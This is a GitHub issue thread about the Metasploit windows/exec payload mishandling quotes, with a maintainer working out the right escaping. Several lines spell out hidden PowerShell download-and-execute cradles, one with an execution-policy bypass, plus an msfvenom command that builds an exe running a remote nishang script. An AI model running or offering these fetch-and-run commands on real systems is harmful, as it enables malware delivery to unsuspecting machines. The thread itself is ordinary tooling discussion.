### ISSUE TITLE
Payload "windows/exec" doesn't handle double "' characters

### ISSUE THREAD

**Issue by Admin9961** [rapid7/metasploit-framework#19385]
To test set CMD:
`powershell -ep bypass -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://yoursite/tool.exe', \"$env:TEMP\tool.exe\"); Start-Sleep -Seconds 2; Start-Process \"$env:TEMP\tool.exe\""`

It will ignore your input and print back a broken output, missing quotes thus making invalid syntax:
`powershell -ep bypass -w hidden -c (New-Object Net.WebClient).DownloadFile('http://yoursite/tool.exe', \'$env:TEMP\tool.exe\'); Start-Sleep -Seconds 2; Start-Process \'$env:TEMP\tool.exe\'`

Maybe it can be bypassed by encoding commands with base64 but it would be cool to see this payload to handle quotes properly

EDIT:
msfvenom error
`>msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
.downloadString('http://IP/nishang.ps1')\"" was unexpected at this time.`

**Comment by smcintyre-r7** [comment]
Can you please provide the exact command you used?

**Comment by smcintyre-r7** [comment]
You have to escape the slashes. Try this instead:
`set CMD powershell -ep bypass -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://yoursite/tool.exe', "$env:TEMP\\tool.exe"); Start-Sleep -Seconds 2; Start-Process "$env:TEMP\\tool.exe""`

```
msf6 payload(windows/exec) > show options 

Module options (payload/windows/exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        yes       The command string to execute
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)


View the full module info with the info, or info -d command.

msf6 payload(windows/exec) > set CMD powershell -ep bypass -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://yoursite/tool.exe', "$env:TEMP\tool.exe"); Start-Sleep -Seconds 2; Start-Process "$env:TEMP\tool.exe""
CMD => powershell -ep bypass -w hidden -c (New-Object Net.WebClient).DownloadFile('http://yoursite/tool.exe', $env:TEMPtool.exe); Start-Sleep -Seconds 2; Start-Process $env:TEMPtool.exe
msf6 payload(windows/exec) > set CMD powershell -ep bypass -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://yoursite/tool.exe', "$env:TEMP\\tool.exe"); Start-Sleep -Seconds 2; Start-Process "$env:TEMP\\tool.exe""
CMD => powershell -ep bypass -w hidden -c (New-Object Net.WebClient).DownloadFile('http://yoursite/tool.exe', $env:TEMP\tool.exe); Start-Sleep -Seconds 2; Start-Process $env:TEMP\tool.exe
msf6 payload(windows/exec) >
```

**Comment by smcintyre-r7** [comment]
Alright, I spent a little time debugging this to figure out that the command you actually want is this:

```
set CMD powershell -ep bypass -w hidden -c \"(New-Object Net.WebClient).DownloadFile(\'http://yoursite/tool.exe\', \\\"$env:TEMP\\tool.exe\\\"); Start-Sleep -Seconds 2; Start-Process \\\"$env:TEMP\\tool.exe\\\"\"
```

There were more characters that needed to be escaped. If you're interested in the methodology I took to debug this, I used Process Monitor from sysinternals and delivered the payload using psexec. I then watched for Process Creation and Process Start events. When I saw the payload, I inspected the args and compared them to what I was expecting from Metasploit. I also took the commands and ran them on their own in `cmd.exe` to get errors from Powershell about what was wrong.
